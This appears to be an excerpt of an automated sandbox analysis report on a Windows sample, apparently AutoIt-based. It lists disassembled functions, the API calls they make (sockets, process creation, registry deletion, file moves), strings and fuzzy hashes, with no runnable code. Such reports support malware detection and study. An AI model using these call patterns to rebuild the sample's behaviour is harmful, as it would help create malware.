                            • _memset.LIBCMT ref: 00DAED56
                            Strings
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: 1872054092412eddbaceb05942929a8d5b18c8d40f621abd869441e842a11630
                            • Instruction ID: 5b8de7e2ad067fe60f7a210a3b0cc781340da360e46c9d9a82764319bed5c570
                            • Opcode Fuzzy Hash: 1872054092412eddbaceb05942929a8d5b18c8d40f621abd869441e842a11630
                            • Instruction Fuzzy Hash: 11C17D716087019FC764EF24C895A6AB7E4FF85310F04492DF8999B2A2DB70ED45CBB2
                            APIs
                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DB6C00
                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DB6C21
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB6C34
                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00DB6CEA
                            • inet_ntoa.WSOCK32(?), ref: 00DB6CA7
                              • Part of subcall function 00D9A7E9: _strlen.LIBCMT ref: 00D9A7F3
                              • Part of subcall function 00D9A7E9: _memmove.LIBCMT ref: 00D9A815
                            • _strlen.LIBCMT ref: 00DB6D44
                            • _memmove.LIBCMT ref: 00DB6DAD
                            Similarity
                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                            • String ID:
                            • API String ID: 3619996494-0
                            • Opcode ID: 1e0dbd75d1ee52bf2e3dae2eb5b3f8e3732dbd36ba5621362fb26bb3c1e42a47
                            • Instruction ID: a95c4e4ecef877a80a28e09d5fa0267ec5187282c2379d88afbcb1d4c6337f3a
                            • Opcode Fuzzy Hash: 1e0dbd75d1ee52bf2e3dae2eb5b3f8e3732dbd36ba5621362fb26bb3c1e42a47
                            • Instruction Fuzzy Hash: 9081AC71204300ABC710EB24DC92EAFB7A9EF84714F544A19F9569B292DB74ED05CBB2
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 403c4dccc2f3addbf817f582f36638444a13443870f3ee28d5154c2d768700a8
                            • Instruction ID: 84af1db775c9bea85a23b7a64cd2302767177a9ee5671eb55815a5923b24005f
                            • Opcode Fuzzy Hash: 403c4dccc2f3addbf817f582f36638444a13443870f3ee28d5154c2d768700a8
                            • Instruction Fuzzy Hash: 32715D34900209EFCB14CF98CC89EBEBB79FF85324F148159F919AA251D734AA91CB74
                            APIs
                            • IsWindow.USER32(00932440), ref: 00DCB3EB
                            • IsWindowEnabled.USER32(00932440), ref: 00DCB3F7
                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00DCB4DB
                            • SendMessageW.USER32(00932440,000000B0,?,?), ref: 00DCB512
                            • IsDlgButtonChecked.USER32(?,?,?,?), ref: 00DCB54F
                            • GetWindowLongW.USER32(00932440,000000EC), ref: 00DCB571
                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DCB589
                            Similarity
                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                            • String ID:
                            • API String ID: 4072528602-0
                            • Opcode ID: 2d0bbbd8054a56d3d452354772cf3f41b7d06035ab571674ca90dd93a9c28b2c
                            • Instruction ID: 3f3d84d7e5e0fb00cd76edcc86f64330f95c87c021ead0d87e5bace0e9cbef0e
                            • Opcode Fuzzy Hash: 2d0bbbd8054a56d3d452354772cf3f41b7d06035ab571674ca90dd93a9c28b2c
                            • Instruction Fuzzy Hash: DB71AF34608646EFDB289F54C896FBA7BA5EF49320F18415EE941973A2C732E840DF70
                            APIs
                            • _memset.LIBCMT ref: 00DBF448
                            • _memset.LIBCMT ref: 00DBF511
                            • ShellExecuteExW.SHELL32(?), ref: 00DBF556
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                            • GetProcessId.KERNEL32(00000000), ref: 00DBF5CD
                            • CloseHandle.KERNEL32(00000000), ref: 00DBF5FC
                            Strings
                            Similarity
                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 3522835683-2766056989
                            • Opcode ID: 143bd68553a49b41290469683b87efcc04e990262db7d6987848cf790470c934
                            • Instruction ID: 9661a65c2fdfb78261104e11cdea43fc1bb5c6bdcf855ab3d8fc01a342d81502
                            • Opcode Fuzzy Hash: 143bd68553a49b41290469683b87efcc04e990262db7d6987848cf790470c934
                            • Instruction Fuzzy Hash: 70617975A00619DFCB14DF68C8919AEBBF5FF49310F148469E85AAB351CB31AD41CBB0
                            APIs
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 8a36316a1600670dcf162fc90ad80b3f169ba1ddd2d3451390c1b266ce255f29
                            • Instruction ID: d9f62dd04bef7bdb7f84883ba124bda867a7410f4c7c3b0cc25e26dab586deb2
                            • Opcode Fuzzy Hash: 8a36316a1600670dcf162fc90ad80b3f169ba1ddd2d3451390c1b266ce255f29
                            • Instruction Fuzzy Hash: 0451E1A06087D63DFB3642348C15BBABEA95F07304F0C8589E1D4968C2C3A9ECC8D775
                            APIs
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 6071a4082006d54755e8bc1652431f51bb85f53bb73cbf3a34875f1434f53c94
                            • Instruction ID: 483b5708c46ad7c1a620e82fa0ccaa42039d17aa1dbe48495cf5d804413d66fd
                            • Opcode Fuzzy Hash: 6071a4082006d54755e8bc1652431f51bb85f53bb73cbf3a34875f1434f53c94
                            • Instruction Fuzzy Hash: 2451D1A15447D63DFB3287648C45BBABEA9AB07300F0C8889F1D4968C2D395ED98E771
                            APIs
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: 748d5ccb729d0c877b6fceb2b6bc1ae22030cd21ca45590a7481e6c7611bf785
                            • Instruction ID: ad4e808d50989daab217adff6cf2bb7fd9d6c4dc96ec479083a8a244bab64899
                            • Opcode Fuzzy Hash: 748d5ccb729d0c877b6fceb2b6bc1ae22030cd21ca45590a7481e6c7611bf785
                            • Instruction Fuzzy Hash: 2E41A176C1061477CB11EBB89C869DFB3B8EF05310F508966E509E3261EB34A245C7BA
                            APIs
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DA3697,?), ref: 00DA468B
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DA3697,?), ref: 00DA46A4
                            • lstrcmpiW.KERNEL32(?,?), ref: 00DA36B7
                            • _wcscmp.LIBCMT ref: 00DA36D3
                            • MoveFileW.KERNEL32 ref: 00DA36EB
                            • _wcscat.LIBCMT ref: 00DA3733
                            • SHFileOperationW.SHELL32(?), ref: 00DA379F
                            Strings
                            Similarity
                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 1377345388-1173974218
                            • Opcode ID: 63f357531f217eadedcff6094a43fd68fd1bafcbe174475c0666fc253cfab145
                            • Instruction ID: e2afc20f575d246d4dc735e73d1c5e3bfe9fc7554aab4522ca64030d99179b55
                            • Opcode Fuzzy Hash: 63f357531f217eadedcff6094a43fd68fd1bafcbe174475c0666fc253cfab145
                            • Instruction Fuzzy Hash: C7418171508345AEC752EF64C4419DFB7E8EF8A340F48092EB49AC3251EB34D689CB72
                            APIs
                            Strings
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert_memset
                            • String ID: 0
                            • API String ID: 3866635326-4108050209
                            • Opcode ID: c1e41078b07cf62a1fed3de339a13dda0fc4acf14a9a3267bf888909956aa582
                            • Instruction ID: 6d5fe652b28afef1007c279001b3615ae938bf28ef2fd820a6f42c447e1648fa
                            • Opcode Fuzzy Hash: c1e41078b07cf62a1fed3de339a13dda0fc4acf14a9a3267bf888909956aa582
                            • Instruction Fuzzy Hash: C5412675A0424AAFDB20DF50D884EAABBB9FB04350F188529FD65A7290D731AD50DF60
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DC0FD4
                            • RegOpenKeyExW.ADVAPI32 ref: 00DC0FFE
                            • FreeLibrary.KERNEL32(00000000), ref: 00DC10B5
                              • Part of subcall function 00DC0FA5: RegCloseKey.ADVAPI32(?), ref: 00DC101B
                              • Part of subcall function 00DC0FA5: FreeLibrary.KERNEL32(?), ref: 00DC106D
                              • Part of subcall function 00DC0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DC1090
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DC1058
                            Similarity
                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: 15ec7d8a54c252d80952f5921ddf1c869e85ca5e67a6cd74b483b14c3ae212bc
                            • Instruction ID: a4595321948a452c062ab4e4dac326d2df9c2693c7ffa997ece82e59c0454c2e
                            • Opcode Fuzzy Hash: 15ec7d8a54c252d80952f5921ddf1c869e85ca5e67a6cd74b483b14c3ae212bc
                            • Instruction Fuzzy Hash: F5311D7590021ABFDB15DF90DC89EFEB7BCEF09300F144169E511E3241D6749E89AAB0
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC62EC
                            • GetWindowLongW.USER32(00932440,000000F0), ref: 00DC631F
                            • GetWindowLongW.USER32(00932440,000000F0), ref: 00DC6354
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DC6386
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DC63B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC63C1
                            • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00DC9E3C,?,?,?,?), ref: 00DC63DB
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID:
                            • API String ID: 2178440468-0
                            • Opcode ID: d66cf0cfa38a3bb80921d1e2bbfab5dc0341962b8acfadac79feac4e78e059d1
                            • Instruction ID: 9ad370e8791d59ea67726d3347aec41e50128a0eda1f8b1a7d1e2d238c76216f
                            • Opcode Fuzzy Hash: d66cf0cfa38a3bb80921d1e2bbfab5dc0341962b8acfadac79feac4e78e059d1
                            • Instruction Fuzzy Hash: 0B31F031644292AFDB208F59DC84F9537E1FB5A714F1D41A8FA01DF2B2CB72E8849B61
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DB2E
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DB54
                            • SysAllocString.OLEAUT32(00000000), ref: 00D9DB57
                            • SysAllocString.OLEAUT32(?), ref: 00D9DB75
                            • SysFreeString.OLEAUT32(?), ref: 00D9DB7E
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D9DBA3
                            • SysAllocString.OLEAUT32(?), ref: 00D9DBB1
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: 9c335a14d681d4153cd6f4c68e16c382633c4cc2bd2cd25ed0db38226eb3751e
                            • Instruction ID: ddf0017c3534015f26cf3a354efa700e235fb62a1766a59c04df61369f7792eb
                            • Opcode Fuzzy Hash: 9c335a14d681d4153cd6f4c68e16c382633c4cc2bd2cd25ed0db38226eb3751e
                            • Instruction Fuzzy Hash: E221907660421AAFDF10DFA8DC88CFB77AEEB09364B058526F958DB260D674DC418B70
                            APIs
                              • Part of subcall function 00DB7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB7DB6
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DB61C6
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB61D5
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00DB620E
                            • connect.WSOCK32(00000000,?,00000010), ref: 00DB6217
                            • WSAGetLastError.WSOCK32 ref: 00DB6221
                            • closesocket.WSOCK32(00000000), ref: 00DB624A
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00DB6263
                            Similarity
                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 910771015-0
                            • Opcode ID: 44f03229f27c0052911ab1d76377e0ab89fc1fcffa1c2cdcacec995fda5d7df5
                            • Instruction ID: a60322dc49b31964d26c2c995eabdd293920b541e6f821de1d9e0e8c39055cf3
                            • Opcode Fuzzy Hash: 44f03229f27c0052911ab1d76377e0ab89fc1fcffa1c2cdcacec995fda5d7df5
                            • Instruction Fuzzy Hash: 08316B71600219ABEF10AF68CC85FFE7BA9EF45764F044029F906E7291DB74ED048AB1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: ae3a8a0df20d54b671aeb898052e4f864c4ce5851530fd124d354d3a81ca8b5c
                            • Instruction ID: b22ea8b6d19900dca040dbb1968710968bd5ec93c4c516b8309a2ba654f46bd8
                            • Opcode Fuzzy Hash: ae3a8a0df20d54b671aeb898052e4f864c4ce5851530fd124d354d3a81ca8b5c
                            • Instruction Fuzzy Hash: AA21F6722046117BDB20AB34AC02FB77398EF55354F18483AF986C6191EB61ED46D2B5
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DC09
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9DC2F
                            • SysAllocString.OLEAUT32(00000000), ref: 00D9DC32
                            • SysAllocString.OLEAUT32 ref: 00D9DC53
                            • SysFreeString.OLEAUT32 ref: 00D9DC5C
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D9DC76
                            • SysAllocString.OLEAUT32(?), ref: 00D9DC84
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: f128488f7dee729e1ac4540c439a2182f05a707bb4bc8a8ac94627ab0d61794c
                            • Instruction ID: 691ae2bb5123fbbe940a9c269856e7285dd9497d184f6bee77ac3870e928d1e5
                            • Opcode Fuzzy Hash: f128488f7dee729e1ac4540c439a2182f05a707bb4bc8a8ac94627ab0d61794c
                            • Instruction Fuzzy Hash: 63214175604206AF9F14DFA8DC88DAB77EDEB0D360B148125F955CB261DAB0DC41CB74
                            APIs
                              • Part of subcall function 00D41D35: CreateWindowExW.USER32 ref: 00D41D73
                              • Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
                              • Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DC7632
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DC763F
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DC764A
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DC7659
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DC7665
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            • Opcode ID: 906ba54a8dddd0c1b2822fd2d758c0f5ab6b131dcca0366737e06efee64409d4
                            • Instruction ID: 0e94c7d3fb0a022f77a1baabd0c9a5c1acdd2cd79dade323f88af6214cdb3534
                            • Opcode Fuzzy Hash: 906ba54a8dddd0c1b2822fd2d758c0f5ab6b131dcca0366737e06efee64409d4
                            • Instruction Fuzzy Hash: E71190B215021ABFEF118F64CC85EE7BF6DEF08798F014115BA04A20A0CA729C21DBB4
                            APIs
                            • __init_pointers.LIBCMT ref: 00D69AE6
                              • Part of subcall function 00D63187: RtlEncodePointer.NTDLL(00000000), ref: 00D6318A
                              • Part of subcall function 00D63187: __initp_misc_winsig.LIBCMT ref: 00D631A5
                              • Part of subcall function 00D63187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D69EA0
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D69EB4
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D69EC7
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D69EDA
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D69EED
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D69F00
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D69F13
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D69F26
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D69F39
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D69F4C
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D69F5F
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D69F72
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D69F85
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D69F98
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D69FAB
                              • Part of subcall function 00D63187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D69FBE
                            • __mtinitlocks.LIBCMT ref: 00D69AEB
                            • __mtterm.LIBCMT ref: 00D69AF4
                              • Part of subcall function 00D69B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D69AF9,00D67CD0,00DFA0B8,00000014), ref: 00D69C56
                              • Part of subcall function 00D69B5C: _free.LIBCMT ref: 00D69C5D
                              • Part of subcall function 00D69B5C: DeleteCriticalSection.KERNEL32(02,?,?,00D69AF9,00D67CD0,00DFA0B8,00000014), ref: 00D69C7F
                            • __calloc_crt.LIBCMT ref: 00D69B19
                            • __initptd.LIBCMT ref: 00D69B3B
                            • GetCurrentThreadId.KERNEL32(00D67CD0,00DFA0B8,00000014), ref: 00D69B42
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: e1d5ea989e9c3ac1ce9bb9d0d4f9c87c81c29a561dae2b20fcc9b823f3cdbcff
                            • Instruction ID: bbed6f5612dd8a3d15b47c7d24dd1cd94226a1616b06f6e640aac3a07cf75b01
                            • Opcode Fuzzy Hash: e1d5ea989e9c3ac1ce9bb9d0d4f9c87c81c29a561dae2b20fcc9b823f3cdbcff
                            • Instruction Fuzzy Hash: 9AF090326097125BEA347BB8BC23A9AB7DDDF02730F244A2AF460C61D2EF70844149B0
                            APIs
                            • _memset.LIBCMT ref: 00DCB644
                            • _memset.LIBCMT ref: 00DCB653
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E06F20,00E06F64), ref: 00DCB682
                            • CloseHandle.KERNEL32 ref: 00DCB694
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID: o$do
                            • API String ID: 3277943733-2180341428
                            • Opcode ID: 1497391920498771d8a5e37591271ef983f5fdb374150daa2bc6366a3ac8a50e
                            • Instruction ID: 995e05c0c5f054dac97eca15d16987d060f87700595be9e784fa623bd4e0be70
                            • Opcode Fuzzy Hash: 1497391920498771d8a5e37591271ef983f5fdb374150daa2bc6366a3ac8a50e
                            • Instruction Fuzzy Hash: 85F0F4B16403077FE2102B65BC06FBB7A9CEB55795F004021FA08F5191DB765C648BB8
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D63F85), ref: 00D64085
                            • GetProcAddress.KERNEL32(00000000), ref: 00D6408C
                            • EncodePointer.KERNEL32(00000000), ref: 00D64097
                            • DecodePointer.KERNEL32(00D63F85), ref: 00D640B2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 3489934621-2819208100
                            • Opcode ID: a6508bd26581d1d39586318fa3facd0325e82656eedee92a06564ba7993b775f
                            • Instruction ID: a3265f07397c02186a57fd72aa48f7f49dcdcf166639f3bd11c1b612fd345768
                            • Opcode Fuzzy Hash: a6508bd26581d1d39586318fa3facd0325e82656eedee92a06564ba7993b775f
                            • Instruction Fuzzy Hash: 13E0BF70582302EFDB109F72EC0DF553AAAB718742F144026F101E12A4CBB74648CA34
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            • Opcode ID: eff7f4e5f5b6e760b2da2a9c47064d3ee6628312d1e99789fb4305ac86d0cacb
                            • Instruction ID: ee9d440a18ac490060c77d6f715b3ff1af18a19e798df1f3fb8b5e80e6258671
                            • Opcode Fuzzy Hash: eff7f4e5f5b6e760b2da2a9c47064d3ee6628312d1e99789fb4305ac86d0cacb
                            • Instruction Fuzzy Hash: 37617A3090025A9BCF11EF64CC92AFF7BA5EF46308F084959F8596B292DB35E915CB70
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00DC0E1A: CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC02BD
                            • RegOpenKeyExW.ADVAPI32 ref: 00DC02FD
                            • RegCloseKey.ADVAPI32(?), ref: 00DC0320
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DC0349
                            • RegCloseKey.ADVAPI32(?), ref: 00DC038C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC0399
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            • Opcode ID: 5d4f9c607dd4ecab006a5c8a6862b03266893628cc6f135f8e1c34084040d920
                            • Instruction ID: 60bc33ddada089bc41a26cee3de5d30f75baa728050381055c73fc59be4b9a5b
                            • Opcode Fuzzy Hash: 5d4f9c607dd4ecab006a5c8a6862b03266893628cc6f135f8e1c34084040d920
                            • Instruction Fuzzy Hash: 1C512731208241AFCB14EF64C885EAEBBE9FF85714F04491DF595872A2DB31E905DB72
                            APIs
                            • GetMenu.USER32(?,00000001,00000000), ref: 00DC57FB
                            • GetMenuItemCount.USER32(00000000), ref: 00DC5832
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DC585A
                            • GetMenuItemID.USER32(?,?), ref: 00DC58C9
                            • GetSubMenu.USER32(?,?), ref: 00DC58D7
                            • PostMessageW.USER32 ref: 00DC5928
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
